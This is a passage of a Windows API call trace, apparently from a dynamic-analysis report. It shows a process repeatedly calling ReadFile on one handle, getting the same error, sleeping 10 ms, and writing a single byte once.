	[0240.631] GetLastError () returned 0x218
	[0240.631] Sleep (dwMilliseconds=0xa) 
	[0240.646] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.646] GetLastError () returned 0x218
	[0240.646] Sleep (dwMilliseconds=0xa) 
	[0240.693] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.693] GetLastError () returned 0x218
	[0240.693] Sleep (dwMilliseconds=0xa) 
	[0240.740] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.740] GetLastError () returned 0x218
	[0240.740] Sleep (dwMilliseconds=0xa) 
	[0240.786] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.786] GetLastError () returned 0x218
	[0240.786] Sleep (dwMilliseconds=0xa) 
	[0240.787] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.787] GetLastError () returned 0x218
	[0240.787] Sleep (dwMilliseconds=0xa) 
	[0240.802] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.802] GetLastError () returned 0x218
	[0240.805] Sleep (dwMilliseconds=0xa) 
	[0240.818] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.818] GetLastError () returned 0x218
	[0240.818] Sleep (dwMilliseconds=0xa) 
	[0240.833] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.833] GetLastError () returned 0x218
	[0240.834] Sleep (dwMilliseconds=0xa) 
	[0240.849] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.849] GetLastError () returned 0x218
	[0240.849] Sleep (dwMilliseconds=0xa) 
	[0240.866] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.866] GetLastError () returned 0x218
	[0240.866] Sleep (dwMilliseconds=0xa) 
	[0240.881] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.881] GetLastError () returned 0x218
	[0240.881] Sleep (dwMilliseconds=0xa) 
	[0240.927] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.927] GetLastError () returned 0x218
	[0240.927] Sleep (dwMilliseconds=0xa) 
	[0240.974] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0240.974] GetLastError () returned 0x218
	[0240.974] Sleep (dwMilliseconds=0xa) 
	[0241.020] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.020] GetLastError () returned 0x218
	[0241.022] Sleep (dwMilliseconds=0xa) 
	[0241.036] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.036] GetLastError () returned 0x218
	[0241.036] Sleep (dwMilliseconds=0xa) 
	[0241.052] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.052] GetLastError () returned 0x218
	[0241.052] Sleep (dwMilliseconds=0xa) 
	[0241.067] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.067] GetLastError () returned 0x218
	[0241.067] Sleep (dwMilliseconds=0xa) 
	[0241.083] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.083] GetLastError () returned 0x218
	[0241.083] Sleep (dwMilliseconds=0xa) 
	[0241.100] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.100] GetLastError () returned 0x218
	[0241.100] Sleep (dwMilliseconds=0xa) 
	[0241.114] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.115] GetLastError () returned 0x218
	[0241.115] Sleep (dwMilliseconds=0xa) 
	[0241.161] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.161] GetLastError () returned 0x218
	[0241.161] Sleep (dwMilliseconds=0xa) 
	[0241.208] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.208] GetLastError () returned 0x218
	[0241.208] Sleep (dwMilliseconds=0xa) 
	[0241.286] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.286] GetLastError () returned 0x218
	[0241.286] Sleep (dwMilliseconds=0xa) 
	[0241.345] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.345] GetLastError () returned 0x218
	[0241.345] Sleep (dwMilliseconds=0xa) 
	[0241.375] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.375] GetLastError () returned 0x218
	[0241.375] Sleep (dwMilliseconds=0xa) 
	[0241.384] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.384] GetLastError () returned 0x218
	[0241.384] Sleep (dwMilliseconds=0xa) 
	[0241.395] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.395] GetLastError () returned 0x218
	[0241.395] Sleep (dwMilliseconds=0xa) 
	[0241.411] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.411] GetLastError () returned 0x218
	[0241.411] Sleep (dwMilliseconds=0xa) 
	[0241.434] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.434] GetLastError () returned 0x218
	[0241.435] Sleep (dwMilliseconds=0xa) 
	[0241.473] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.473] GetLastError () returned 0x218
	[0241.473] Sleep (dwMilliseconds=0xa) 
	[0241.520] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.520] GetLastError () returned 0x218
	[0241.520] Sleep (dwMilliseconds=0xa) 
	[0241.566] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.567] GetLastError () returned 0x218
	[0241.567] Sleep (dwMilliseconds=0xa) 
	[0241.582] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.582] GetLastError () returned 0x218
	[0241.582] Sleep (dwMilliseconds=0xa) 
	[0241.598] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.598] GetLastError () returned 0x218
	[0241.598] Sleep (dwMilliseconds=0xa) 
	[0241.614] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.614] GetLastError () returned 0x218
	[0241.614] Sleep (dwMilliseconds=0xa) 
	[0241.629] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.629] GetLastError () returned 0x218
	[0241.630] Sleep (dwMilliseconds=0xa) 
	[0241.645] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.645] GetLastError () returned 0x218
	[0241.646] Sleep (dwMilliseconds=0xa) 
	[0241.661] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.661] GetLastError () returned 0x218
	[0241.661] Sleep (dwMilliseconds=0xa) 
	[0241.676] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.676] GetLastError () returned 0x218
	[0241.676] Sleep (dwMilliseconds=0xa) 
	[0241.722] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.723] GetLastError () returned 0x218
	[0241.723] Sleep (dwMilliseconds=0xa) 
	[0241.769] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.769] GetLastError () returned 0x218
	[0241.769] Sleep (dwMilliseconds=0xa) 
	[0241.800] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.800] GetLastError () returned 0x218
	[0241.800] Sleep (dwMilliseconds=0xa) 
	[0241.801] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.801] GetLastError () returned 0x218
	[0241.801] Sleep (dwMilliseconds=0xa) 
	[0241.816] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.816] GetLastError () returned 0x218
	[0241.816] Sleep (dwMilliseconds=0xa) 
	[0241.832] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.832] GetLastError () returned 0x218
	[0241.832] Sleep (dwMilliseconds=0xa) 
	[0241.847] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.847] GetLastError () returned 0x218
	[0241.848] Sleep (dwMilliseconds=0xa) 
	[0241.864] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.864] GetLastError () returned 0x218
	[0241.864] Sleep (dwMilliseconds=0xa) 
	[0241.879] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.879] GetLastError () returned 0x218
	[0241.879] Sleep (dwMilliseconds=0xa) 
	[0241.894] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.894] GetLastError () returned 0x218
	[0241.894] Sleep (dwMilliseconds=0xa) 
	[0241.941] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0241.941] GetLastError () returned 0x218
	[0241.941] Sleep (dwMilliseconds=0x3e8) 
	[0242.987] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0242.987] Sleep (dwMilliseconds=0xa) 
	[0243.034] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.034] GetLastError () returned 0x218
	[0243.034] Sleep (dwMilliseconds=0xa) 
	[0243.080] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.080] GetLastError () returned 0x218
	[0243.080] Sleep (dwMilliseconds=0xa) 
	[0243.103] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.103] GetLastError () returned 0x218
	[0243.103] Sleep (dwMilliseconds=0xa) 
	[0243.112] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.112] GetLastError () returned 0x218
	[0243.112] Sleep (dwMilliseconds=0xa) 
	[0243.128] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.128] GetLastError () returned 0x218
	[0243.128] Sleep (dwMilliseconds=0xa) 
	[0243.144] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.144] GetLastError () returned 0x218
	[0243.145] Sleep (dwMilliseconds=0xa) 
	[0243.160] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.160] GetLastError () returned 0x218
	[0243.160] Sleep (dwMilliseconds=0xa) 
	[0243.191] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.191] GetLastError () returned 0x218
	[0243.191] Sleep (dwMilliseconds=0xa) 
	[0243.237] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.237] GetLastError () returned 0x218
	[0243.237] Sleep (dwMilliseconds=0xa) 
	[0243.296] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.296] GetLastError () returned 0x218
	[0243.296] Sleep (dwMilliseconds=0xa) 
	[0243.330] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.330] GetLastError () returned 0x218
	[0243.330] Sleep (dwMilliseconds=0xa) 
	[0243.378] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.378] GetLastError () returned 0x218
	[0243.378] Sleep (dwMilliseconds=0xa) 
	[0243.397] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.397] GetLastError () returned 0x218
	[0243.397] Sleep (dwMilliseconds=0xa) 
	[0243.408] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.408] GetLastError () returned 0x218
	[0243.408] Sleep (dwMilliseconds=0xa) 
	[0243.424] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.424] GetLastError () returned 0x218
	[0243.424] Sleep (dwMilliseconds=0xa) 
	[0243.440] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.440] GetLastError () returned 0x218
	[0243.441] Sleep (dwMilliseconds=0xa) 
	[0243.456] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.456] GetLastError () returned 0x218
	[0243.456] Sleep (dwMilliseconds=0xa) 
	[0243.474] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.474] GetLastError () returned 0x218
	[0243.474] Sleep (dwMilliseconds=0xa) 
	[0243.487] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.487] GetLastError () returned 0x218
	[0243.487] Sleep (dwMilliseconds=0xa) 
	[0243.503] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.503] GetLastError () returned 0x218
	[0243.503] Sleep (dwMilliseconds=0xa) 
	[0243.548] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.548] GetLastError () returned 0x218
	[0243.548] Sleep (dwMilliseconds=0xa) 
	[0243.595] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.595] GetLastError () returned 0x218
	[0243.595] Sleep (dwMilliseconds=0xa) 
	[0243.637] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.637] GetLastError () returned 0x218
	[0243.637] Sleep (dwMilliseconds=0xa) 
	[0243.642] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.642] GetLastError () returned 0x218
	[0243.642] Sleep (dwMilliseconds=0xa) 
	[0243.658] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.658] GetLastError () returned 0x218
	[0243.658] Sleep (dwMilliseconds=0xa) 
	[0243.674] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.674] GetLastError () returned 0x218
	[0243.674] Sleep (dwMilliseconds=0xa) 
	[0243.690] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.691] GetLastError () returned 0x218
	[0243.691] Sleep (dwMilliseconds=0xa) 
	[0243.706] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0243.706] GetLastError () returned 0x218
	[0243.706] Sleep (dwMilliseconds=0xa) 
